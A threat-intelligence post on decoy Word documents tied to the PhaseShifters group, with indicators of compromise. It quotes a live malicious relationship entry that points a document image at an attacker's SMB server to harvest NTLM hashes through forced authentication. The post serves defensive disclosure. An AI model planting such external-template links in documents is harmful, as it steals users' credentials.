[ << ALL_FEED ]

Your hash, please… Thank you!

More in General

Your hash, please… Thank you! 🙏

In early January, we discovered a file that drew attention for its content and structure. An examination of the document’s metadata, as well as the techniques used to connect to a server via the SMB protocol through DOCX files, allowed us to establish a link to the hacker group PhaseShifters. We published information about it in an article in November 2024 (Figure 1). That article also describes in detail the connections to the UAC-0050 group, which will be discussed further below.

🆕 The C2 server is new, the approach is old

The first file we want to talk about is a decoy. It contains a photograph (Figure 2) of a document allegedly belonging to a company in the military-industrial sector (UAV manufacturing).

As in previous attacks, inside the document there is a template link through which the user’s NTLM hash sums are obtained. This technique is called Forced Authentication: via a template or relationships with external entities, the device establishes a connection to the attackers’ server via the SMB protocol, causing Windows to automatically attempt authentication on that resource.

The file contains a reference to an SMB resource on an external server 45.155.249.126. Server activity has been observed since November 2024; the connection occurs through the relations mechanism of WordprocessingML document parts:

<ns0:Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file://\\45.155.249.126\19i6LJ4qNx81SkAFg4mtUbf5.png" TargetMode="External" /></ns0:Relationships>
Code language: plaintext (plaintext)


👤 By searching for other files associated with this IP address, we identified several more decoy documents for attacks on organizations (Figures 3–5). Additionally, an important detail is worth noting: the metadata contains the username of the person who created or last modified the document — kib vol.

The presence of a connection to an external SMB server, as well as unique metadata, allowed us to latch onto another file, which in turn was associated with a different IP address (31.214.157.167) belonging to the attackers — АО-******- -12904ДО.docx. This document was used in attacks employing Ozone RAT and Darktrack RAT, which are also described in our article (Figure 1).

By examining the subnet 31.214.157.0/24, at least one more IP address can be identified that has been observed in similar incidents — 31.214.157.49. This server was used in attacks by both PhaseShifters (for example, ГВПК ответ цифровому развитию.docx) and UAC-0050 (using the domain tax-gov-ua.com). Let us recall that the similarities between these two groups still require thorough investigation.

IoCs

C2 servers:
45.155.249.126
31.214.157.167
31.214.157.49
Code language: plaintext (plaintext)


SHA-256:
3172bf0dd76232fc633214f0ba92b25d27b136a2ed5d9e4e7d06b0686ef4d34c
3eca76737c6aee34b4c38845fde13bceed23a31d39e958893a44f42380ff84d5
fd50307b7f08d037c5d37f2505c8de6edc9c57e1843f4434309a135f4b43ff5c
5061e83a380a9c3ebe91bd5de80fe8f11b666a182efbebe13a1b0dfbc2842487
Code language: plaintext (plaintext)


#TI #C2 #ioc #Phishing
@ptescalator

More from ti_author

More from ti_author

More in General